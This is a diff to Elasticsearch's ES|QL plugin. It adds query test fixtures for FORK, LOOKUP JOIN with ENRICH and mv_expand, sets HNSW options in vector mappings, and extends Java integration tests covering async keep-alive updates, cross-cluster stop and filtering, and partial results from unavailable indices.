b/x-pack/plugin/esql/qa/testFixtures/src/main/resources/fork.csv-spec @@ -5,16 +5,44 @@ simpleFork required_capability: fork_v9 +// tag::simpleFork[] FROM employees | FORK ( WHERE emp_no == 10001 ) ( WHERE emp_no == 10002 ) | KEEP emp_no, _fork | SORT emp_no +// end::simpleFork[] ; +// tag::simpleFork-result[] emp_no:integer | _fork:keyword 10001 | fork1 10002 | fork2 +// end::simpleFork-result[] +; + +simpleForkWithStats +required_capability: fork_v9 + +// tag::simpleForkWithStats[] +FROM books METADATA _score +| WHERE author:"Faulkner" +| EVAL score = round(_score, 2) +| FORK (SORT score DESC, author | LIMIT 5 | KEEP author, score) + (STATS total = COUNT(*)) +| SORT _fork, score DESC, author +// end::simpleForkWithStats[] +; + +// tag::simpleForkWithStats-result[] +author:text | score:double | _fork:keyword | total:long +William Faulkner | 2.39 | fork1 | null +William Faulkner | 2.39 | fork1 | null +Colleen Faulkner | 1.59 | fork1 | null +Danny Faulkner | 1.59 | fork1 | null +Keith Faulkner | 1.59 | fork1 | null +null | null | fork2 | 18 +// end::simpleForkWithStats-result[] ;
forkWithWhereSortAndLimit diff --git a/x-pack/plugin/esql/qa/testFixtures/src/main/resources/lookup-join.csv-spec b/x-pack/plugin/esql/qa/testFixtures/src/main/resources/lookup-join.csv-spec index 6254b42e176fa..108ae5e250fad 100644 --- a/x-pack/plugin/esql/qa/testFixtures/src/main/resources/lookup-join.csv-spec +++ b/x-pack/plugin/esql/qa/testFixtures/src/main/resources/lookup-join.csv-spec @@ -1841,6 +1841,41 @@ max:long 8268153 ; +wildcardDropAfterLookupJoin +required_capability: join_lookup_v12 +required_capability: drop_with_wildcard_after_lookup_join + +ROW somefield = 0, type = "Production" +| KEEP somefield, type +| LOOKUP JOIN message_types_lookup ON type +| DROP *field +; + +type:keyword | message:keyword +Production | Production environment +; + + +wildcardDropAfterLookupJoinTwice +required_capability: join_lookup_v12 +required_capability: drop_with_wildcard_after_lookup_join + +ROW somefield = 0, type = "Production" +| KEEP somefield, type +| EVAL otherfield = 123, language_code = 3 +| LOOKUP JOIN message_types_lookup ON type +| DROP *field +| EVAL foofield = 123 +| KEEP * +| LOOKUP JOIN languages_lookup ON language_code +| DROP *ge, *field +; + +type:keyword | language_code:integer | language_name:keyword +Production | 3 | Spanish +; + + ############################################### # LOOKUP JOIN on mixed numerical fields ############################################### @@ -4738,3 +4773,101 @@ FROM sample_data_ts_nanos 2023-10-23T12:27:28.948123456Z | 172.21.2.113 | 2764889 | Connected to 10.1.0.2 2023-10-23T12:15:03.360123456Z | 172.21.2.162 | 3450233 | Connected to 10.1.0.3 ; + +############################################### +# LOOKUP JOIN and ENRICH +############################################### + +enrichAfterLookupJoin +required_capability: join_lookup_v12 + +FROM sample_data +| KEEP message +| WHERE message == "Connected to 10.1.0.1" +| EVAL language_code = "1" +| LOOKUP JOIN message_types_lookup ON message +| ENRICH languages_policy ON language_code +; + +message:keyword | language_code:keyword | type:keyword | language_name:keyword +Connected to 10.1.0.1 | 1 | Success | English +; + + +lookupJoinAfterEnrich +required_capability: join_lookup_v12 + +FROM sample_data +| KEEP message +| WHERE message == "Connected to 10.1.0.1" +| EVAL language_code = "1" +| ENRICH languages_policy ON language_code +| LOOKUP JOIN message_types_lookup ON message +; + +message:keyword | language_code:keyword | language_name:keyword | type:keyword +Connected to 10.1.0.1 | 1 | English | Success +; + + +lookupJoinAfterRemoteEnrich +required_capability: join_lookup_v12 + +FROM sample_data +| KEEP message +| WHERE message == "Connected to 10.1.0.1" +| EVAL language_code = "1" +| ENRICH _remote:languages_policy ON language_code +| LOOKUP JOIN message_types_lookup ON message +; + +message:keyword | language_code:keyword | language_name:keyword | type:keyword +Connected to 10.1.0.1 | 1 | English | Success +; + + +lookupJoinAfterLimitAndRemoteEnrich +required_capability: join_lookup_v12 + +FROM sample_data +| KEEP message +| WHERE message == "Connected to 10.1.0.1" +| EVAL language_code = "1" +| LIMIT 1 +| ENRICH _remote:languages_policy ON language_code +| EVAL enrich_language_name = language_name, language_code = language_code::integer +| LOOKUP JOIN languages_lookup_non_unique_key ON language_code +| KEEP message, enrich_language_name, language_name, country.keyword +| SORT language_name, country.keyword +; + +message:keyword | enrich_language_name:keyword | language_name:keyword | 
country.keyword:keyword +Connected to 10.1.0.1 | English | English | Canada +Connected to 10.1.0.1 | English | English | United States of America +Connected to 10.1.0.1 | English | English | null +Connected to 10.1.0.1 | English | null | United Kingdom +; + + +lookupJoinAfterTopNAndRemoteEnrich +required_capability: join_lookup_v12 + +FROM sample_data +| KEEP message +| WHERE message == "Connected to 10.1.0.1" +| EVAL language_code = "1" +| SORT message +| LIMIT 1 +| ENRICH _remote:languages_policy ON language_code +| EVAL enrich_language_name = language_name, language_code = language_code::integer +| LOOKUP JOIN languages_lookup_non_unique_key ON language_code +| KEEP message, enrich_language_name, language_name, country.keyword +| SORT language_name, country.keyword +; + +message:keyword | enrich_language_name:keyword | language_name:keyword | country.keyword:keyword +Connected to 10.1.0.1 | English | English | Canada +Connected to 10.1.0.1 | English | English | United States of America +Connected to 10.1.0.1 | English | English | null +Connected to 10.1.0.1 | English | null | United Kingdom +; diff --git a/x-pack/plugin/esql/qa/testFixtures/src/main/resources/mapping-colors.json b/x-pack/plugin/esql/qa/testFixtures/src/main/resources/mapping-colors.json index 24c4102e428f8..0d7373e300267 100644 --- a/x-pack/plugin/esql/qa/testFixtures/src/main/resources/mapping-colors.json +++ b/x-pack/plugin/esql/qa/testFixtures/src/main/resources/mapping-colors.json @@ -13,7 +13,9 @@ "type": "dense_vector", "similarity": "l2_norm", "index_options": { - "type": "hnsw" + "type": "hnsw", + "m": 16, + "ef_construction": 100 } } } diff --git a/x-pack/plugin/esql/qa/testFixtures/src/main/resources/mapping-dense_vector.json b/x-pack/plugin/esql/qa/testFixtures/src/main/resources/mapping-dense_vector.json index 572d9870d09da..9c7d34f0f15e4 100644 --- a/x-pack/plugin/esql/qa/testFixtures/src/main/resources/mapping-dense_vector.json +++ b/x-pack/plugin/esql/qa/testFixtures/src/main/resources/mapping-dense_vector.json @@ -5,7 +5,12 @@ }, "vector": { "type": "dense_vector", - "similarity": "l2_norm" + "similarity": "l2_norm", + "index_options": { + "type": "hnsw", + "m": 16, + "ef_construction": 100 + } } } } diff --git a/x-pack/plugin/esql/qa/testFixtures/src/main/resources/mv_expand.csv-spec b/x-pack/plugin/esql/qa/testFixtures/src/main/resources/mv_expand.csv-spec index 20ce3ecc5a396..c7dbe01ef6f09 100644 --- a/x-pack/plugin/esql/qa/testFixtures/src/main/resources/mv_expand.csv-spec +++ b/x-pack/plugin/esql/qa/testFixtures/src/main/resources/mv_expand.csv-spec @@ -419,3 +419,65 @@ emp_no:integer | job_positions:keyword 10001 | Accountant 10001 | Senior Python Developer ; + +testMvExpandInconsistentColumnOrder1 +required_capability: fix_mv_expand_inconsistent_column_order +from message_types +| eval foo_1 = 1, foo_2 = 2 +| sort message +| mv_expand foo_1 +; + +message:keyword | type:keyword | foo_1:integer | foo_2:integer +Connected to 10.1.0.1 | Success | 1 | 2 +Connected to 10.1.0.2 | Success | 1 | 2 +Connected to 10.1.0.3 | Success | 1 | 2 +Connection error | Error | 1 | 2 +Development environment | Development | 1 | 2 +Disconnected | Disconnected | 1 | 2 +Production environment | Production | 1 | 2 +; + +testMvExpandInconsistentColumnOrder2 +required_capability: fix_mv_expand_inconsistent_column_order +from message_types +| eval foo_1 = [1, 3], foo_2 = 2 +| sort message +| mv_expand foo_1 +; + +message:keyword | type:keyword | foo_1:integer | foo_2:integer +Connected to 10.1.0.1 | Success | 1 | 2 +Connected 
to 10.1.0.1 | Success | 3 | 2 +Connected to 10.1.0.2 | Success | 1 | 2 +Connected to 10.1.0.2 | Success | 3 | 2 +Connected to 10.1.0.3 | Success | 1 | 2 +Connected to 10.1.0.3 | Success | 3 | 2 +Connection error | Error | 1 | 2 +Connection error | Error | 3 | 2 +Development environment | Development | 1 | 2 +Development environment | Development | 3 | 2 +Disconnected | Disconnected | 1 | 2 +Disconnected | Disconnected | 3 | 2 +Production environment | Production | 1 | 2 +Production environment | Production | 3 | 2 +; + +testMvExpandInconsistentColumnOrder3 +required_capability: fix_mv_expand_inconsistent_column_order +from message_types +| sort type +| eval language_code = 1, `language_name` = false, message = true, foo_3 = 1, foo_2 = null +| eval foo_3 = "1", `foo_3` = -1, foo_1 = 1, `language_code` = null, `foo_2` = "1" +| mv_expand foo_1 +| limit 5 +; + +type:keyword | language_name:boolean | message:boolean | foo_3:integer | foo_1:integer | language_code:null | foo_2:keyword +Development | false | true | -1 | 1 | null | 1 +Disconnected | false | true | -1 | 1 | null | 1 +Error | false | true | -1 | 1 | null | 1 +Production | false | true | -1 | 1 | null | 1 +Success | false | true | -1 | 1 | null | 1 +; + diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/AsyncEsqlQueryActionIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/AsyncEsqlQueryActionIT.java index 34b94207c5a8d..2aa731eaa5d29 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/AsyncEsqlQueryActionIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/AsyncEsqlQueryActionIT.java @@ -8,15 +8,21 @@ package org.elasticsearch.xpack.esql.action; import org.elasticsearch.ResourceNotFoundException; +import org.elasticsearch.action.get.GetResponse; import org.elasticsearch.action.support.master.AcknowledgedResponse; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.compute.operator.DriverTaskRunner; import org.elasticsearch.compute.operator.exchange.ExchangeService; import org.elasticsearch.core.TimeValue; import org.elasticsearch.plugins.Plugin; +import org.elasticsearch.tasks.CancellableTask; import org.elasticsearch.tasks.TaskCancelledException; import org.elasticsearch.tasks.TaskInfo; +import org.elasticsearch.transport.TransportService; import org.elasticsearch.xpack.core.LocalStateCompositeXPackPlugin; +import org.elasticsearch.xpack.core.XPackPlugin; +import org.elasticsearch.xpack.core.async.AsyncExecutionId; +import org.elasticsearch.xpack.core.async.AsyncTaskIndexService; import org.elasticsearch.xpack.core.async.DeleteAsyncResultRequest; import org.elasticsearch.xpack.core.async.GetAsyncResultRequest; import org.elasticsearch.xpack.core.async.TransportDeleteAsyncResultAction; @@ -40,6 +46,7 @@ import static org.hamcrest.Matchers.empty; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.greaterThanOrEqualTo; +import static org.hamcrest.Matchers.hasSize; import static org.hamcrest.Matchers.is; import static org.hamcrest.Matchers.not; import static org.hamcrest.Matchers.notNullValue; @@ -260,6 +267,90 @@ private void testFinishingBeforeTimeout(boolean keepOnCompletion) { } } + public void testUpdateKeepAlive() throws Exception { + long nowInMillis = System.currentTimeMillis(); + TimeValue keepAlive = timeValueSeconds(between(30, 60)); + var request = 
EsqlQueryRequestBuilder.newAsyncEsqlQueryRequestBuilder(client()) + .query("from test | stats sum(pause_me)") + .pragmas(queryPragmas()) + .waitForCompletionTimeout(TimeValue.timeValueMillis(between(1, 10))) + .keepOnCompletion(randomBoolean()) + .keepAlive(keepAlive); + final String asyncId; + long currentExpiration; + try { + try (EsqlQueryResponse initialResponse = request.execute().actionGet(60, TimeUnit.SECONDS)) { + assertThat(initialResponse.isRunning(), is(true)); + assertTrue(initialResponse.asyncExecutionId().isPresent()); + asyncId = initialResponse.asyncExecutionId().get(); + } + currentExpiration = getExpirationFromTask(asyncId); + assertThat(currentExpiration, greaterThanOrEqualTo(nowInMillis + keepAlive.getMillis())); + // update the expiration while the task is still running + int iters = iterations(1, 5); + for (int i = 0; i < iters; i++) { + long extraKeepAlive = randomIntBetween(30, 60); + keepAlive = TimeValue.timeValueSeconds(keepAlive.seconds() + extraKeepAlive); + GetAsyncResultRequest getRequest = new GetAsyncResultRequest(asyncId).setKeepAlive(keepAlive); + try (var resp = client().execute(EsqlAsyncGetResultAction.INSTANCE, getRequest).actionGet()) { + assertThat(resp.asyncExecutionId(), isPresent()); + assertThat(resp.asyncExecutionId().get(), equalTo(asyncId)); + assertTrue(resp.isRunning()); + } + long updatedExpiration = getExpirationFromTask(asyncId); + assertThat(updatedExpiration, greaterThanOrEqualTo(currentExpiration + extraKeepAlive)); + assertThat(updatedExpiration, greaterThanOrEqualTo(nowInMillis + keepAlive.getMillis())); + currentExpiration = updatedExpiration; + } + } finally { + scriptPermits.release(numberOfDocs()); + } + // allow the query to complete, then update the expiration while the result is being stored in the async index + assertBusy(() -> { + GetAsyncResultRequest getRequest = new GetAsyncResultRequest(asyncId); + try (var resp = client().execute(EsqlAsyncGetResultAction.INSTANCE, getRequest).actionGet()) { + assertThat(resp.isRunning(), is(false)); + } + }); + // update the keepAlive after the query has completed + int iters = between(1, 5); + for (int i = 0; i < iters; i++) { + long extraKeepAlive = randomIntBetween(30, 60); + keepAlive = TimeValue.timeValueSeconds(keepAlive.seconds() + extraKeepAlive); + GetAsyncResultRequest getRequest = new GetAsyncResultRequest(asyncId).setKeepAlive(keepAlive); + try (var resp = client().execute(EsqlAsyncGetResultAction.INSTANCE, getRequest).actionGet()) { + assertThat(resp.isRunning(), is(false)); + } + long updatedExpiration = getExpirationFromDoc(asyncId); + assertThat(updatedExpiration, greaterThanOrEqualTo(currentExpiration + extraKeepAlive)); + assertThat(updatedExpiration, greaterThanOrEqualTo(nowInMillis + keepAlive.getMillis())); + currentExpiration = updatedExpiration; + } + } + + private static long getExpirationFromTask(String asyncId) { + List tasks = new ArrayList<>(); + for (TransportService ts : internalCluster().getInstances(TransportService.class)) { + for (CancellableTask task : ts.getTaskManager().getCancellableTasks().values()) { + if (task instanceof EsqlQueryTask queryTask) { + EsqlQueryResponse result = queryTask.getCurrentResult(); + if (result.isAsync() && result.asyncExecutionId().get().equals(asyncId)) { + tasks.add(queryTask); + } + } + } + } + assertThat(tasks, hasSize(1)); + return tasks.getFirst().getExpirationTimeMillis(); + } + + private static long getExpirationFromDoc(String asyncId) { + String docId = AsyncExecutionId.decode(asyncId).getDocId(); + GetResponse
doc = client().prepareGet().setIndex(XPackPlugin.ASYNC_RESULTS_INDEX).setId(docId).get(); + assertTrue(doc.isExists()); + return ((Number) doc.getSource().get(AsyncTaskIndexService.EXPIRATION_TIME_FIELD)).longValue(); + } + private List getEsqlQueryTasks() throws Exception { List foundTasks = new ArrayList<>(); assertBusy(() -> { diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/CrossClusterAsyncQueryStopIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/CrossClusterAsyncQueryStopIT.java index 37e6b0bb48404..b91b365cf996b 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/CrossClusterAsyncQueryStopIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/CrossClusterAsyncQueryStopIT.java @@ -9,11 +9,15 @@ import org.elasticsearch.Build; import org.elasticsearch.action.ActionFuture; +import org.elasticsearch.client.internal.Client; import org.elasticsearch.core.Tuple; import org.elasticsearch.logging.LogManager; import org.elasticsearch.logging.Logger; import org.elasticsearch.tasks.TaskInfo; +import org.elasticsearch.transport.TransportService; import org.elasticsearch.xpack.core.async.AsyncStopRequest; +import org.elasticsearch.xpack.esql.plugin.EsqlPlugin; +import org.elasticsearch.xpack.esql.plugin.QueryPragmas; import java.util.Iterator; import java.util.List; @@ -125,27 +129,39 @@ public void testStopQuery() throws Exception { } public void testStopQueryLocal() throws Exception { + assumeTrue("Pragma does not work in release builds", Build.current().isSnapshot()); Map testClusterInfo = setupClusters(3); int remote1NumShards = (Integer) testClusterInfo.get("remote1.num_shards"); int remote2NumShards = (Integer) testClusterInfo.get("remote2.num_shards"); populateRuntimeIndex(LOCAL_CLUSTER, "pause", INDEX_WITH_BLOCKING_MAPPING); + // Get a random node client, but ensure it's the same node for all operations + Client client = cluster(LOCAL_CLUSTER).client(); + Tuple includeCCSMetadata = randomIncludeCCSMetadata(); boolean responseExpectMeta = includeCCSMetadata.v2(); - - final String asyncExecutionId = startAsyncQuery( - client(), + // By default, ES|QL uses all workers in the esql_worker threadpool to execute drivers on data nodes. + // If a node is both data and coordinator, and all drivers are blocked by the allowEmitting latch, + // there are no workers left to execute the final driver or fetch pages from remote clusters. + // This can prevent remote clusters from being marked as successful on the coordinator, even if they + // have completed. To avoid this, we reserve at least one worker for the final driver and page fetching. + // A single worker is enough, as these two tasks can be paused and yielded.
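+        // For example (illustrative numbers): with an esql_worker pool of size 4, the TASK_CONCURRENCY pragma below
+        // is set to a value between 1 and 3, leaving at least one worker free for those two tasks.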
+ var threadpool = cluster(LOCAL_CLUSTER).getInstance(TransportService.class).getThreadPool(); + int maxEsqlWorkers = threadpool.info(EsqlPlugin.ESQL_WORKER_THREAD_POOL_NAME).getMax(); + LOGGER.info("--> Launching async query"); + final String asyncExecutionId = startAsyncQueryWithPragmas( + client, "FROM blocking,*:logs-* | STATS total=sum(coalesce(const,v)) | LIMIT 1", - includeCCSMetadata.v1() + includeCCSMetadata.v1(), + Map.of(QueryPragmas.TASK_CONCURRENCY.getKey(), between(1, maxEsqlWorkers - 1)) ); - try { // wait until we know that the local query against 'blocking' has started assertTrue(SimplePauseFieldPlugin.startEmitting.await(30, TimeUnit.SECONDS)); // wait until the remotes are done - waitForCluster(client(), REMOTE_CLUSTER_1, asyncExecutionId); - waitForCluster(client(), REMOTE_CLUSTER_2, asyncExecutionId); + waitForCluster(client, REMOTE_CLUSTER_1, asyncExecutionId); + waitForCluster(client, REMOTE_CLUSTER_2, asyncExecutionId); /* at this point: * the query against remotes should be finished @@ -154,10 +170,10 @@ public void testStopQueryLocal() throws Exception { // run the stop query AsyncStopRequest stopRequest = new AsyncStopRequest(asyncExecutionId); LOGGER.info("Launching stop for {}", asyncExecutionId); - ActionFuture stopAction = client().execute(EsqlAsyncStopAction.INSTANCE, stopRequest); + ActionFuture stopAction = client.execute(EsqlAsyncStopAction.INSTANCE, stopRequest); // ensure stop operation is running assertBusy(() -> { - try (EsqlQueryResponse asyncResponse = getAsyncResponse(client(), asyncExecutionId)) { + try (EsqlQueryResponse asyncResponse = getAsyncResponse(client, asyncExecutionId)) { EsqlExecutionInfo executionInfo = asyncResponse.getExecutionInfo(); LOGGER.info("Waiting for stop operation to start, current status: {}", executionInfo); assertNotNull(executionInfo); @@ -201,7 +217,7 @@ public void testStopQueryLocal() throws Exception { } } finally { SimplePauseFieldPlugin.allowEmitting.countDown(); - assertAcked(deleteAsyncId(client(), asyncExecutionId)); + assertAcked(deleteAsyncId(client, asyncExecutionId)); } } diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/CrossClusterQueryWithFiltersIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/CrossClusterQueryWithFiltersIT.java index 91f1cc12851dc..9f057621aabf7 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/CrossClusterQueryWithFiltersIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/CrossClusterQueryWithFiltersIT.java @@ -62,8 +62,10 @@ protected void assertClusterMetadata(EsqlExecutionInfo.Cluster clusterMetatata, protected void assertClusterMetadataSuccess(EsqlExecutionInfo.Cluster clusterMetatata, int shards, long took, String indexExpression) { assertClusterMetadata(clusterMetatata, took, indexExpression, Status.SUCCESSFUL); assertThat(clusterMetatata.getTotalShards(), equalTo(shards)); - assertThat(clusterMetatata.getSuccessfulShards(), equalTo(shards)); - assertThat(clusterMetatata.getSkippedShards(), equalTo(0)); + // We should have at least one successful shard for data + assertThat(clusterMetatata.getSuccessfulShards(), greaterThanOrEqualTo(1)); + // Some shards may be skipped, but total sum of the shards should match up + assertThat(clusterMetatata.getSkippedShards() + clusterMetatata.getSuccessfulShards(), equalTo(shards)); } protected void assertClusterMetadataNoShards(EsqlExecutionInfo.Cluster 
clusterMetatata, long took, String indexExpression) { @@ -81,7 +83,7 @@ protected void assertClusterMetadataSkippedShards( ) { assertClusterMetadata(clusterMetatata, took, indexExpression, Status.SUCCESSFUL); assertThat(clusterMetatata.getTotalShards(), equalTo(shards)); - assertThat(clusterMetatata.getSuccessfulShards(), equalTo(shards)); + assertThat(clusterMetatata.getSuccessfulShards(), equalTo(0)); assertThat(clusterMetatata.getSkippedShards(), equalTo(shards)); } @@ -313,13 +315,13 @@ public void testFilterWithMissingRemoteIndex() { new RangeQueryBuilder("@timestamp").from("2025-01-01").to("now") )) { count++; - // Local index missing + // Remote index missing VerificationException e = expectThrows( VerificationException.class, () -> runQuery("from cluster-a:missing", randomBoolean(), filter).close() ); assertThat(e.getDetailedMessage(), containsString("Unknown index [cluster-a:missing]")); - // Local index missing + wildcards + // Remote index missing + wildcards // FIXME: planner does not catch this now, it should be VerificationException but for now it's runtime RemoteException var ie = expectThrows( RemoteException.class, @@ -352,6 +354,66 @@ public void testFilterWithMissingRemoteIndex() { } } + public void testFilterWithMissingRemoteIndexSkipUnavailable() { + int docsTest1 = 50; + int docsTest2 = 30; + int localShards = randomIntBetween(1, 5); + int remoteShards = randomIntBetween(1, 5); + populateDateIndex(LOCAL_CLUSTER, LOCAL_INDEX, localShards, docsTest1, "2024-11-26"); + populateDateIndex(REMOTE_CLUSTER_1, REMOTE_INDEX, remoteShards, docsTest2, "2023-11-26"); + setSkipUnavailable(REMOTE_CLUSTER_1, true); + + int count = 0; + for (var filter : List.of( + new RangeQueryBuilder("@timestamp").from("2023-01-01").to("now"), + new RangeQueryBuilder("@timestamp").from("2024-01-01").to("now"), + new RangeQueryBuilder("@timestamp").from("2025-01-01").to("now") + )) { + count++; + try (EsqlQueryResponse resp = runQuery("from cluster-a:missing,logs-1", randomBoolean(), filter)) { + List> values = getValuesList(resp); + assertThat(values, hasSize(count > 2 ? 
0 : docsTest1)); + EsqlExecutionInfo executionInfo = resp.getExecutionInfo(); + assertNotNull(executionInfo); + assertThat(executionInfo.isCrossClusterSearch(), is(true)); + long overallTookMillis = executionInfo.overallTook().millis(); + assertThat(overallTookMillis, greaterThanOrEqualTo(0L)); + + EsqlExecutionInfo.Cluster remoteCluster = executionInfo.getCluster(REMOTE_CLUSTER_1); + assertClusterMetadataSkipped(remoteCluster, overallTookMillis, "missing"); + assertThat(remoteCluster.getFailures(), hasSize(1)); + var fail = remoteCluster.getFailures().get(0); + assertThat(fail.getCause().getMessage(), containsString("Unknown index [cluster-a:missing]")); + } + + try (EsqlQueryResponse resp = runQuery("from cluster-a:missing,cluster-a:logs-*", randomBoolean(), filter)) { + List> values = getValuesList(resp); + assertThat(values, hasSize(0)); + EsqlExecutionInfo executionInfo = resp.getExecutionInfo(); + assertNotNull(executionInfo); + assertThat(executionInfo.isCrossClusterSearch(), is(true)); + long overallTookMillis = executionInfo.overallTook().millis(); + assertThat(overallTookMillis, greaterThanOrEqualTo(0L)); + + EsqlExecutionInfo.Cluster remoteCluster = executionInfo.getCluster(REMOTE_CLUSTER_1); + assertClusterMetadataSkipped(remoteCluster, overallTookMillis, "missing,logs-*"); + assertThat(remoteCluster.getFailures(), hasSize(1)); + var fail = remoteCluster.getFailures().get(0); + assertThat(fail.getCause().getMessage(), containsString("no such index [missing]")); + } + // TODO: for now, these fail, but in the future may be skipped instead + // Remote index missing + VerificationException e = expectThrows( + VerificationException.class, + () -> runQuery("from cluster-a:missing", randomBoolean(), filter).close() + ); + assertThat(e.getDetailedMessage(), containsString("Unknown index [cluster-a:missing]")); + // Wildcard index missing + e = expectThrows(VerificationException.class, () -> runQuery("from cluster-a:missing*", randomBoolean(), filter).close()); + assertThat(e.getDetailedMessage(), containsString("Unknown index [cluster-a:missing*]")); + } + } + private void checkRemoteFailures() { for (var filter : List.of( new RangeQueryBuilder("@timestamp").from("2024-01-01").to("now"), diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/CrossClusterQueryWithPartialResultsIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/CrossClusterQueryWithPartialResultsIT.java index 62d5904b58b86..46a06f44fecfa 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/CrossClusterQueryWithPartialResultsIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/action/CrossClusterQueryWithPartialResultsIT.java @@ -10,6 +10,7 @@ import org.elasticsearch.ExceptionsHelper; import org.elasticsearch.ResourceNotFoundException; import org.elasticsearch.action.search.ShardSearchFailure; +import org.elasticsearch.action.support.ActiveShardCount; import org.elasticsearch.client.internal.Client; import org.elasticsearch.common.breaker.CircuitBreaker; import org.elasticsearch.common.breaker.CircuitBreakingException; @@ -41,11 +42,13 @@ import static org.hamcrest.Matchers.empty; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.greaterThan; +import static org.hamcrest.Matchers.hasSize; import static org.hamcrest.Matchers.in; import static org.hamcrest.Matchers.instanceOf; import static org.hamcrest.Matchers.is; import static 
org.hamcrest.Matchers.lessThanOrEqualTo; import static org.hamcrest.Matchers.not; +import static org.hamcrest.Matchers.oneOf; public class CrossClusterQueryWithPartialResultsIT extends AbstractCrossClusterTestCase { @@ -62,12 +65,15 @@ private static class ClusterSetup { void populateIndices() throws Exception { local.okIds = populateIndex(LOCAL_CLUSTER, "ok-local", local.okShards, between(1, 100)); populateIndexWithFailingFields(LOCAL_CLUSTER, "fail-local", local.failingShards); + createUnavailableIndex(LOCAL_CLUSTER, "unavailable-local"); remote1.okIds = populateIndex(REMOTE_CLUSTER_1, "ok-cluster1", remote1.okShards, between(1, 100)); populateIndexWithFailingFields(REMOTE_CLUSTER_1, "fail-cluster1", remote1.failingShards); + createUnavailableIndex(REMOTE_CLUSTER_1, "unavailable-cluster1"); remote2.okIds = populateIndex(REMOTE_CLUSTER_2, "ok-cluster2", remote2.okShards, between(1, 100)); populateIndexWithFailingFields(REMOTE_CLUSTER_2, "fail-cluster2", remote2.failingShards); + createUnavailableIndex(REMOTE_CLUSTER_2, "unavailable-cluster2"); } private void assertClusterPartial(EsqlQueryResponse resp, String clusterAlias, ClusterSetup cluster) { @@ -290,7 +296,11 @@ public void testFailToStartRequestOnRemoteCluster() throws Exception { assertThat(returnedIds, equalTo(local.okIds)); assertClusterSuccess(resp, LOCAL_CLUSTER, local.okShards); EsqlExecutionInfo.Cluster remoteInfo = resp.getExecutionInfo().getCluster(REMOTE_CLUSTER_1); - assertThat(remoteInfo.getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.SKIPPED)); + // It could also return partial on failure + assertThat( + remoteInfo.getStatus(), + oneOf(EsqlExecutionInfo.Cluster.Status.SKIPPED, EsqlExecutionInfo.Cluster.Status.PARTIAL) + ); assertClusterFailure(resp, REMOTE_CLUSTER_1, simulatedFailure.getMessage()); } } finally { @@ -356,6 +366,42 @@ private static Exception randomFailure() { ); } + public void testResolutionFailures() throws Exception { + populateIndices(); + EsqlQueryRequest request = new EsqlQueryRequest(); + request.allowPartialResults(true); + request.query("FROM ok*,unavailable* | LIMIT 1000"); + try (var resp = runQuery(request)) { + assertThat(EsqlTestUtils.getValuesList(resp), hasSize(local.okIds.size())); + assertTrue(resp.isPartial()); + EsqlExecutionInfo executionInfo = resp.getExecutionInfo(); + var localCluster = executionInfo.getCluster(LOCAL_CLUSTER); + assertThat(localCluster.getFailures(), not(empty())); + assertThat(localCluster.getFailures().get(0).reason(), containsString("index [unavailable-local] has no active shard copy")); + } + request.query("FROM *:ok*,unavailable* | LIMIT 1000"); + try (var resp = runQuery(request)) { + assertThat(EsqlTestUtils.getValuesList(resp), hasSize(remote1.okIds.size() + remote2.okIds.size())); + assertTrue(resp.isPartial()); + var executionInfo = resp.getExecutionInfo(); + var localCluster = executionInfo.getCluster(LOCAL_CLUSTER); + assertThat(localCluster.getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.SKIPPED)); + assertThat(localCluster.getFailures(), not(empty())); + assertThat(localCluster.getFailures().get(0).reason(), containsString("index [unavailable-local] has no active shard copy")); + assertThat(executionInfo.getCluster(REMOTE_CLUSTER_1).getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.SUCCESSFUL)); + assertThat(executionInfo.getCluster(REMOTE_CLUSTER_2).getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.SUCCESSFUL)); + } + request.query("FROM ok*,cluster-a:unavailable* | LIMIT 1000"); + try (var resp = runQuery(request)) { + 
            assertThat(EsqlTestUtils.getValuesList(resp), hasSize(local.okIds.size()));
+            assertTrue(resp.isPartial());
+            var remote1 = resp.getExecutionInfo().getCluster(REMOTE_CLUSTER_1);
+            assertThat(remote1.getFailures(), not(empty()));
+            assertThat(remote1.getFailures().get(0).reason(), containsString("index [unavailable-cluster1] has no active shard copy"));
+            assertThat(resp.getExecutionInfo().getCluster(LOCAL_CLUSTER).getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.SUCCESSFUL));
+        }
+    }
+
     private Set<String> populateIndexWithFailingFields(String clusterAlias, String indexName, int numShards) throws IOException {
         Client client = client(clusterAlias);
         XContentBuilder mapping = JsonXContent.contentBuilder().startObject();
@@ -398,4 +444,15 @@ private Set<String> populateIndexWithFailingFields(String clusterAlias, String i
         }
         return ids;
     }
+
+    private void createUnavailableIndex(String clusterAlias, String indexName) throws IOException {
+        Client client = client(clusterAlias);
+        assertAcked(
+            client.admin()
+                .indices()
+                .prepareCreate(indexName)
+                .setSettings(Settings.builder().put("index.routing.allocation.include._name", "no_such_node"))
